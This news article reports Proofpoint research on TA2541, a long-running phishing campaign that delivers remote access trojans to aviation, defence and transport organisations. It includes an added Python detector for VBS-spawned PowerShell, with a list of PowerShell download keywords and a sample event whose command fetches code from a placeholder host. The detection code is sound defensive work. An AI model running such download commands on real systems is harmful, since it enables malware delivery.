An unknown criminal hacking group is targeting organisations in the aviation, aerospace, defence, transportation and manufacturing industries with trojan malware, in attacks that researchers say have been going on for years.
Dubbed TA2541 and detailed by cybersecurity researchers at Proofpoint, the persistent cyber-criminal operation has been active since 2017 and has compromised hundreds of organisations across North America, Europe, and the Middle East.
Despite running for years, the attacks have barely evolved, broadly following the same targeting and themes in which attackers remotely control compromised machines, conduct reconnaissance on networks and steal sensitive data.
"What's noteworthy about TA2541 is how little they've changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans," said Sherrod DeGrippo, vice president of threat research and detection at Proofpoint.
"This group is a persistent threat to targets throughout the transportation, logistics, and travel industries."
Attacks begin with phishing emails designed to be relevant to individuals and businesses in the sectors being targeted. For example, one lure sent to targets in aviation and aerospace resembles requests for aircraft parts, while another is designed to look like an urgent request for air ambulance flight details. At one point, the attackers introduced COVID-19-themed lures, although these were soon dropped.
While the lures aren't highly customised and follow regular templates, the sheer number of messages sent over the years – hundreds of thousands in total – and their implied urgency will be enough to fool victims into downloading malware. The messages are nearly always in English.
TA2541 initially sent emails containing macro-laden Microsoft Word attachments that downloaded the Remote Access Trojan (RAT) payload, but the group has recently shifted to using Google Drive and Microsoft OneDrive URLs, which lead to an obfuscated Visual Basic Script (VBS) file.
Interacting with these files – the names of which follow similar themes to the initial lures – will leverage PowerShell functions to download malware onto compromised Windows machines.
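The delivery chain described above, a VBS file that uses PowerShell to download the payload, leaves a recognisable parent/child process pattern on the endpoint. As an added example (not taken from Proofpoint's report or the original article), this Python code flags that pattern in process-creation events; the field names follow Sysmon Event ID 1, while the sample events and the list of download keywords are constructed assumptions.

```python
import ntpath
import re

# Script hosts that run .vbs files, and the PowerShell binaries they may launch.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Generic PowerShell download primitives (assumed heuristics, not from the report).
DOWNLOAD_HINTS = re.compile(
    r"invoke-webrequest|downloadstring|downloadfile|net\.webclient|start-bitstransfer", re.I)
VBS_ARG = re.compile(r"\.vbs\b", re.IGNORECASE)


def exe(path):
    return ntpath.basename(path).lower()  # executable name from a Windows path


def classify(event):
    """Return None, 'vbs-spawned-powershell' or 'vbs-spawned-powershell-download'."""
    child, parent = exe(event["Image"]), exe(event["ParentImage"])
    if child not in POWERSHELL or parent not in SCRIPT_HOSTS:
        return None
    if not VBS_ARG.search(event.get("ParentCommandLine", "")):
        return None
    if DOWNLOAD_HINTS.search(event.get("CommandLine", "")):
        return "vbs-spawned-powershell-download"
    return "vbs-spawned-powershell"


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c (New-Object Net.WebClient).DownloadString('https://example.invalid/a')",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "ParentCommandLine": r'wscript.exe "C:\Users\alice\Downloads\parts request.vbs"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\admin\\inventory.ps1",
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile Get-Date",
     "ParentImage": r"C:\Windows\System32\cscript.exe",
     "ParentCommandLine": r"cscript.exe //nologo C:\Temp\job.VBS"},
]


def scan(events):
    """Return (index, verdict) for every event that matches the chain."""
    return [(i, v) for i, e in enumerate(events) if (v := classify(e))]
```

Legitimate logon or administration scripts can also start PowerShell from a script host, so matches without a download hint are candidates for review against a baseline, not verdicts.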
The cyber criminals have distributed over a dozen different trojan malware payloads since the campaigns began, all of which are available to buy on dark web forums or can be downloaded from open-source repositories.
Currently, the most commonly delivered malware in TA2541 campaigns is AsyncRAT, but other popular payloads include NetWire, WSH RAT and Parallax.
No matter which malware is delivered, it's used to gain remote control of infected machines and steal data, although researchers note that they still don't know what the ultimate goal of the group is, or where they are operating from.
The campaign is still active and it's been warned that the attackers will continue to distribute phishing emails and deliver malware to victims around the world.